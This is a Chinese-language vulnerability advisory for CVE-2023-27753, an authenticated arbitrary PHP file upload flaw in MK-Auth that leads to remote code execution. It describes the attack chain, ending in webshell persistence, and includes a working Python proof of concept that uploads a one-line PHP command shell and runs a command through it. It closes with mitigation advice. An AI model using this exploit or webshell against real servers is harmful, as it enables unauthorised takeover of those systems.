CVE-2023-27753 MK-Auth任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2023-27753

漏洞类型

任意文件上传

CVSS评分

8.0 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

MK-Auth

漏洞概述

MK-Auth 23.01K4.9版本存在严重的任意文件上传漏洞。由于系统未对上传文件的类型进行有效验证，经过身份认证的攻击者可上传特制的PHP文件。攻击者可通过访问上传的恶意文件在服务器端执行任意代码，从而完全控制受影响系统。

技术细节

该漏洞源于MK-Auth在处理用户上传的文件时，缺乏足够的文件类型校验机制。攻击者首先需要一个低权限账户（PR:L）登录系统。随后，利用系统存在缺陷的文件上传接口，将包含恶意后门代码的PHP文件发送给服务器。服务器未能识别并拦截该PHP文件，而是将其保存到了Web可访问的目录中。最后，攻击者通过浏览器直接请求该PHP文件的URL，触发服务器端解析引擎执行恶意代码，导致远程代码执行（RCE）。

攻击链分析

STEP 1

步骤1：侦察与认证

攻击者获取目标系统的低权限账户凭证，并成功登录MK-Auth管理面板。

STEP 2

步骤2：漏洞利用

攻击者定位文件上传功能接口，绕过前端验证，通过HTTP POST请求发送包含恶意PHP代码的文件。

STEP 3

步骤3：代码执行

服务器保存恶意PHP文件至Web目录。攻击者通过浏览器访问该文件URL，传入系统命令参数，服务器解析并执行命令。

STEP 4

步骤4：维持权限

攻击者利用执行的环境安装WebShell或后门，获取服务器持久控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target-ip/mk-auth"
login_url = f"{target_url}/index.php"
upload_url = f"{target_url}/upload_endpoint" 
shell_url = f"{target_url}/uploads/shell.php"

# Attacker credentials
username = "attacker"
password = "password"

# 1. Login to get session
session = requests.Session()
payload = {
    "usuario": username,
    "senha": password
}
response = session.post(login_url, data=payload)
if "dashboard" not in response.text:
    print("Login failed")
    exit()

# 2. Upload malicious PHP file
# PHP code to execute system command (e.g., 'whoami')
php_code = "<?php system($_GET['cmd']); ?>"
files = {
    'file': ('shell.php', php_code, 'application/octet-stream')
}
upload_response = session.post(upload_url, files=files)

if upload_response.status_code == 200:
    print("File uploaded successfully")
    
    # 3. Execute the code
    cmd = "whoami"
    exploit_response = session.get(f"{shell_url}?cmd={cmd}")
    print(f"Command output: {exploit_response.text}")
else:
    print("Upload failed")

影响范围

MK-Auth 23.01K4.9

防御指南

临时缓解措施

如果无法立即升级，建议临时禁用系统的文件上传功能，或在网络边界部署WAF规则，拦截对.php文件的上传请求及访问行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2023-27753
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2023-27753
3 Details https://www.cvedetails.com/cve/CVE-2023-27753/
4 VulDB https://vuldb.com/cve/CVE-2023-27753
5 Link https://github.com/yueslly/MKAUTH-RCE
6 Link https://github.com/yueslly/MKAUTH-RCE/blob/main/README.md